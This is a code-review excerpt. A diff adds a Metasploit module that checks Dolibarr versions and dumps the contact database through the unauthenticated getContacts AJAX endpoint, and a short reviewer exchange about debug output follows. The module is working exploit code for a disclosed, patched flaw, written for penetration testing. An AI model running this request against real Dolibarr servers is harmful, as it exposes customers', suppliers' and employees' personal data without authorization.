modules/auxiliary/scanner/http/dolibarr_16_contact_dump.rb

```diff
@@ -0,0 +1,151 @@
+        'Description' => %q{
+          Dolibarr version 16 < 16.0.5 is vulnerable to a pre-authentication contact database dump.
+          An unauthenticated attacker may retreive a company’s entire customer file, prospects, suppliers,
+          and potentially employee information if a contact file exists.
+          Both public and private notes are also included in the dump.
+        },
+        'Author' => [
+          'Vladimir TOUTAIN', 'Nolan LOSSIGNOL-DRILLIEN'
+        ],
+        'License' => MSF_LICENSE,
+        'DisclosureDate' => '2023-03-14',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [],
+          'SideEffects' => [IOC_IN_LOGS]
+        },
+        'References' => [
+          ['URL', 'https://www.dsecbypass.com/en/dolibarr-pre-auth-contact-database-dump/'],
+          ['URL', 'https://github.com/Dolibarr/dolibarr/blob/16.0.5/ChangeLog#L34'],
+          ['URL', 'https://github.com/Dolibarr/dolibarr/commit/bb7b69ef43673ed403436eac05e0bc31d5033ff7'],
+          ['URL', 'https://github.com/Dolibarr/dolibarr/commit/be82f51f68d738cce205f4ce5b469ef42ed82d9e']
+        ]
+      )
+    )
+    register_options(
+      [
+        Opt::RPORT(80),
+        OptString.new('TARGETURI', [true, 'Path to Dolibarr instance', '/'])
+
+      ]
+    )
+  end
+
+  def check_host(_ip)
+    res = send_request_cgi!({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path)
+    })
+    return Exploit::CheckCode::Unknown unless res && res.code == 200
+
+    vprint_line('--Check Host--')
+    vprint_good("Domain: #{vhost}")
+    vprint_good("Target_URI: #{target_uri}")
+    vprint_good("Response Code: #{res.code}")
+    vprint_good("Response Body: #{res.body}")
+
+    /Dolibarr (?<version>\d+.*\.\d+)/ =~ res.body
+    version = Rex::Version.new(version)
+    if version.between?(Rex::Version.new('16.0.0'), Rex::Version.new('16.0.4'))
+      return [Exploit::CheckCode::Appears, version]
+    elsif version == '0'
+      version = 'not found'
+      return [Exploit::CheckCode::Detected, version]
+    end
+
+    return [Exploit::CheckCode::Safe, version]
+  end
+
+  def exploit
+    res = send_request_cgi!({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'public', 'ticket', 'ajax', 'ajax.php?action=getContacts&email=%')
+    }, 90, true)
+    vprint_line('--Exploit request--')
+    vprint_line("Domain: #{vhost}")
+    vprint_line("Target_URI: #{normalize_uri(target_uri.path, 'public', 'ticket', 'ajax', 'ajax.php?action=getContacts&email=%')}")
+
+    vprint_line('--Exploit response--')
+
+    res_json_document = res.get_json_document['contacts']
+
+    if res && res.code != 200
+      fail_with(Failure::UnexpectedReply, "Exploit response code: #{res.code}")
+    elsif res_json_document.nil?
+      fail_with(Failure::UnexpectedReply, 'Dolibarr database empty')
+    end
+
+    vprint_good("Response Code: #{res.code}")
+    vprint_good("Response Body: #{res.body}")
```

Comment:
This level of debugging is unnecessary. Users can `set HttpTrace true` if they want to see the requests and responses.

Reply:
Thanks, I didn't know about the HttpTrace option !